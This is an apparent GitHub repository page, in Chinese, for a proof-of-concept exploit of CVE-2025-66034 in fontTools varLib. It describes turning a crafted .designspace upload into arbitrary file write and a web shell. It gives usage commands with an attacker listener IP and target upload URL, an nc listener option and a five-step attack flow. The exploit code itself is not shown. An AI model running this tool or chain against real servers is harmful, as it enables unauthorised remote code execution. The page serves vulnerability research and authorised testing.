symphony2colour/varlib-cve-2025-66034

GitHub: symphony2colour/varlib-cve-2025-66034

针对 fontTools varLib 可变字体生成流程中 CVE-2025-66034 漏洞的自动化利用工具,通过构造 .designspace 文件实现从任意文件写入到远程代码执行的完整攻击链。

Stars: 0 | Forks: 0

# fontTools varLib CVE-2025-66034 漏洞利用

cve component vulnerability vector impact language dependency license

本仓库并非介绍新漏洞。 这是针对 **CVE-2025-66034** 的概念验证(Proof-of-Concept)利用代码,该漏洞影响 fontTools varLib 可变字体生成流程。 该漏洞允许攻击者通过精心构造的 `.designspace` 文件控制输出文件名。当存在漏洞的字体生成服务处理该文件时,可能导致服务器文件系统上的 **任意文件写入**。 脚本 **`varlib_cve_2025_66034.py`** 自动化了 payload 创建、字体生成、上传以及可选的 shell 触发过程。 ## 功能特性 - 使用 fontTools 自动创建兼容的 master 字体 - 随机生成 shell 文件名 - 可自定义目标路径和上传端点 - 自动开启 `nc` 监听器 - 无需手动准备字体文件 ## 环境要求 Python **3.9+** 安装依赖: ``` pip install fonttools requests ``` 监听器需要使用 Netcat: ## 使用方法 **如果你的目标是在 localhost 上运行的自建靶场,并且上传路径、文件系统写入路径和 Web 可访问的触发路径与脚本中的默认设置一致,你可以直接运行它。** 基本用法: ``` python varlib_cve_2025_66034.py --ip --port ``` **如果目标使用不同的 URL 或文件系统路径,请使用下面的可用选项覆盖默认值,例如 --url 和 --path** ## 选项 | 参数 | 描述 | |--------|--------| | `--ip` | 攻击者监听 IP | | `--port` | 监听端口 | | `--path` | 写入文件的目标文件系统路径 | | `--url` | 存在漏洞的上传端点 | | `--no-listen` | 禁用自动 netcat 监听器 | 使用自定义选项的示例: ``` python varlib_cve_2025_66034.py --ip 10.10.10.10 --port 5050 --path /var/www/html --url http://target.com/tools/variable-font-generator/process ``` ## 漏洞利用流程 1. 生成兼容的 master 字体 2. 创建恶意的 `.designspace` 文件 3. 通过 multipart POST 上传 payload 4. 在服务器上写入任意文件 5. 通过 HTTP 请求触发 payload ## 致谢 / 鸣谢 特别感谢并致敬: - fontTools 项目的维护者和贡献者,感谢他们在开源 fontTools 库上的工作。 - 发现并负责任地披露 **CVE-2025-66034** 的安全研究人员。 - 开源安全社区,感谢他们记录和分析漏洞,帮助提高软件安全性。 提供此概念验证代码仅用于教育和研究目的,以帮助理解该漏洞及其影响。 ## 免责声明 本代码**仅用于教育和研究目的**提供。 请勿针对你不拥有或未获得明确测试许可的系统使用此漏洞利用代码。 作者不对因使用本软件造成的误用或损害负责。 ## 参考资料 - CVE 详情:https://nvd.nist.gov/vuln/detail/CVE-2025-66034 - GitHub 公告:https://github.com/advisories/GHSA-768j-98cg-p3fv - fontTools 项目:https://github.com/fonttools/fonttools - fontTools 文档:https://fonttools.readthedocs.io/
标签:CISA项目, CTF工具, CVE-2025-66034, Exploit-Dev, fontTools, PoC, Python, RCE, varLib, 任意文件写入, 可变字体, 字符串匹配, 攻击脚本, 文件上传漏洞, 无后门, 暴力破解, 概念验证, 漏洞复现, 漏洞搜索, 编程工具, 网络信息收集, 网络安全, 路径遍历, 远程代码执行, 逆向工具, 隐私保护